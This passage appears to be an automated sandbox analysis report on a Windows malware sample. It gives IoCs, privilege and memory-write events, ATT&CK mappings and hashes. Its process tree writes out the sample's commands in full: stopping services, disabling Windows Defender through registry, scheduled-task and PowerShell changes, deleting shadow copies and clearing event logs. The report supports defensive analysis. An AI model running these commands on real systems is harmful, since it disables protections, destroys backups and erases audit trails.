\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3068 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1000 powershell.exe 2656 powershell.exe 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1516 wevtutil.exe Token: SeBackupPrivilege 1516 wevtutil.exe Token: SeSecurityPrivilege 2224 wevtutil.exe Token: SeBackupPrivilege 2224 wevtutil.exe Token: SeSecurityPrivilege 2264 wevtutil.exe Token: SeBackupPrivilege 2264 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1048 wmic.exe Token: SeSecurityPrivilege 1048 wmic.exe Token: SeTakeOwnershipPrivilege 1048 wmic.exe Token: SeLoadDriverPrivilege 1048 wmic.exe Token: SeSystemProfilePrivilege 1048 wmic.exe Token: SeSystemtimePrivilege 1048 wmic.exe Token: SeProfSingleProcessPrivilege 1048 wmic.exe Token: SeIncBasePriorityPrivilege 1048 wmic.exe Token: SeCreatePagefilePrivilege 1048 wmic.exe Token: SeBackupPrivilege 1048 wmic.exe Token: SeRestorePrivilege 1048 wmic.exe Token: SeShutdownPrivilege 1048 wmic.exe Token: SeDebugPrivilege 1048 wmic.exe Token: SeSystemEnvironmentPrivilege 1048 wmic.exe Token: SeRemoteShutdownPrivilege 1048 wmic.exe Token: SeUndockPrivilege 1048 wmic.exe Token: SeManageVolumePrivilege 1048 wmic.exe Token: 33 1048 wmic.exe Token: 34 1048 wmic.exe Token: 35 1048 wmic.exe Token: SeIncreaseQuotaPrivilege 2072 wmic.exe Token: SeSecurityPrivilege 2072 wmic.exe Token: SeTakeOwnershipPrivilege 2072 wmic.exe Token: SeLoadDriverPrivilege 2072 wmic.exe Token: SeSystemProfilePrivilege 2072 wmic.exe Token: SeSystemtimePrivilege 2072 wmic.exe Token: SeProfSingleProcessPrivilege 2072 wmic.exe Token: SeIncBasePriorityPrivilege 2072 wmic.exe Token: SeCreatePagefilePrivilege 2072 wmic.exe Token: SeBackupPrivilege 2072 wmic.exe Token: SeRestorePrivilege 2072 wmic.exe Token: SeShutdownPrivilege 2072 wmic.exe Token: SeDebugPrivilege 2072 wmic.exe Token: SeSystemEnvironmentPrivilege 2072 wmic.exe Token: SeRemoteShutdownPrivilege 2072 wmic.exe Token: SeUndockPrivilege 2072 wmic.exe Token: SeManageVolumePrivilege 2072 wmic.exe Token: 33 2072 wmic.exe Token: 34 2072 wmic.exe Token: 35 2072 wmic.exe Token: SeIncreaseQuotaPrivilege 2072 wmic.exe Token: SeSecurityPrivilege 2072 wmic.exe Token: SeTakeOwnershipPrivilege 2072 wmic.exe Token: SeLoadDriverPrivilege 2072 wmic.exe Token: SeSystemProfilePrivilege 2072 wmic.exe Token: SeSystemtimePrivilege 2072 wmic.exe Token: SeProfSingleProcessPrivilege 2072 wmic.exe Token: SeIncBasePriorityPrivilege 2072 wmic.exe Token: SeCreatePagefilePrivilege 2072 wmic.exe Token: SeBackupPrivilege 2072 wmic.exe Token: SeRestorePrivilege 2072 wmic.exe Token: SeShutdownPrivilege 2072 wmic.exe Token: SeDebugPrivilege 2072 wmic.exe Token: SeSystemEnvironmentPrivilege 2072 wmic.exe Token: SeRemoteShutdownPrivilege 2072 wmic.exe Token: SeUndockPrivilege 2072 wmic.exe Token: SeManageVolumePrivilege 2072 wmic.exe Token: 33 2072 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2144 wrote to memory of 2704 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 31 PID 2144 wrote to memory of 2704 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 31 PID 2144 wrote to memory of 2704 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 31 PID 2144 wrote to memory of 2704 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 31 PID 2704 wrote to memory of 2676 2704 net.exe 33 PID 2704 wrote to memory of 2676 2704 net.exe 33 PID 2704 wrote to memory of 2676 2704 net.exe 33 PID 2704 wrote to memory of 2676 2704 net.exe 33 PID 2144 wrote to memory of 2780 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 34 PID 2144 wrote to memory of 2780 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 34 PID 2144 wrote to memory of 2780 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 34 PID 2144 wrote to memory of 2780 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 34 PID 2780 wrote to memory of 2556 2780 net.exe 36 PID 2780 wrote to memory of 2556 2780 net.exe 36 PID 2780 wrote to memory of 2556 2780 net.exe 36 PID 2780 wrote to memory of 2556 2780 net.exe 36 PID 2144 wrote to memory of 2136 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 37 PID 2144 wrote to memory of 2136 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 37 PID 2144 wrote to memory of 2136 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 37 PID 2144 wrote to memory of 2136 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 37 PID 2136 wrote to memory of 2052 2136 net.exe 39 PID 2136 wrote to memory of 2052 2136 net.exe 39 PID 2136 wrote to memory of 2052 2136 net.exe 39 PID 2136 wrote to memory of 2052 2136 net.exe 39 PID 2144 wrote to memory of 888 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 40 PID 2144 wrote to memory of 888 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 40 PID 2144 wrote to memory of 888 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 40 PID 2144 wrote to memory of 888 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 40 PID 888 wrote to memory of 2664 888 net.exe 42 PID 888 wrote to memory of 2664 888 net.exe 42 PID 888 wrote to memory of 2664 888 net.exe 42 PID 888 wrote to memory of 2664 888 net.exe 42 PID 2144 wrote to memory of 1312 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 43 PID 2144 wrote to memory of 1312 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 43 PID 2144 wrote to memory of 1312 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 43 PID 2144 wrote to memory of 1312 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 43 PID 1312 wrote to memory of 2560 1312 net.exe 45 PID 1312 wrote to memory of 2560 1312 net.exe 45 PID 1312 wrote to memory of 2560 1312 net.exe 45 PID 1312 wrote to memory of 2560 1312 net.exe 45 PID 2144 wrote to memory of 2568 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 46 PID 2144 wrote to memory of 2568 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 46 PID 2144 wrote to memory of 2568 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 46 PID 2144 wrote to memory of 2568 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 46 PID 2568 wrote to memory of 2612 2568 net.exe 48 PID 2568 wrote to memory of 2612 2568 net.exe 48 PID 2568 wrote to memory of 2612 2568 net.exe 48 PID 2568 wrote to memory of 2612 2568 net.exe 48 PID 2144 wrote to memory of 2628 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 49 PID 2144 wrote to memory of 2628 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 49 PID 2144 wrote to memory of 2628 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 49 PID 2144 wrote to memory of 2628 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 49 PID 2628 wrote to memory of 3008 2628 net.exe 51 PID 2628 wrote to memory of 3008 2628 net.exe 51 PID 2628 wrote to memory of 3008 2628 net.exe 51 PID 2628 wrote to memory of 3008 2628 net.exe 51 PID 2144 wrote to memory of 2600 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 52 PID 2144 wrote to memory of 2600 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 52 PID 2144 wrote to memory of 2600 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 52 PID 2144 wrote to memory of 2600 2144 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe 52 PID 2600 wrote to memory of 3004 2600 net.exe 54 PID 2600 wrote to memory of 3004 2600 net.exe 54 PID 2600 wrote to memory of 3004 2600 net.exe 54 PID 2600 wrote to memory of 3004 2600 net.exe 54 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵
- System Location Discovery: System Language Discovery
PID:2676
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:2556
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵
- System Location Discovery: System Language Discovery
PID:2052
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵
- System Location Discovery: System Language Discovery
PID:2560
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵
- System Location Discovery: System Language Discovery
PID:2612
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3024
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2892
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3052
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2088
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2876
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2308
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1764
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1580
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:2608
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:1684
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:1240
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1304
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1480
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2760
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2848
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1820
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:604
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:332
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3060
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2100
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵
- System Location Discovery: System Language Discovery
PID:624
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1672
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1868
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1864
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:908
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:640
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1756
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2952
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1536
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:3068
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:1320 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵
- System Location Discovery: System Language Discovery
PID:3044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:2928 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2656
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Impair Defenses
4Disable or Modify Tools
2Indicator Removal
3Clear Windows Event Logs
1File Deletion
2Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD52820fcb11d7daa8ec77b1f331a1352b6
SHA116cc7a5cef90c634e5b7440cd1c16933b18bcec7
SHA2567de74dbb2e345a415ea93c7f700cff4c97b0a2dbe65234593d96269148acbdf5
SHA5123cd9504b4e29bdcaf36879eb3e1067827c70786e2d4c47f0be202d1791847533f5cfff5b3ce3a5817566575f07498de0af77c4bf84a2d7acb0705aa411278fc1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD524734752fce937e62010ba8fe29b195c
SHA10dce031a3b3cbe8a922b5dfb5f86b6258ebbeadd
SHA256e0366877d6c18d03a81000c48cb7219aa407dabb392d861f86d865d3984d7a64
SHA512d3783c93c9622f47bcf0eddc56a5559448f597c75cf15f404eddf00d3393f4b19be4fa1819242224619df3866a49b84cca8574e38999bb0e9fec5ef3f3669cf2